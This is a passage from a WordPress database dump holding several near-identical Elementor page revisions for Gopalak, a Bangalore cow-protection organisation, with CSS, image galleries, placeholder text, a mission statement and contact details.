.elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:53:32','2022-10-13 10:23:32','',1373,'https://gopalak.in/?p=1710',0,'revision','',0),(1711,1,'2022-10-13 15:53:32','2022-10-13 10:23:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:53:32','2022-10-13 10:23:32','',1373,'https://gopalak.in/?p=1711',0,'revision','',0),(1712,1,'2022-10-13 15:53:32','2022-10-13 10:23:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:53:32','2022-10-13 10:23:32','',1373,'https://gopalak.in/?p=1712',0,'revision','',0),(1713,1,'2022-10-13 15:54:07','2022-10-13 10:24:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:54:07','2022-10-13 10:24:07','',1373,'https://gopalak.in/?p=1713',0,'revision','',0),(1714,1,'2022-10-13 15:54:08','2022-10-13 10:24:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" 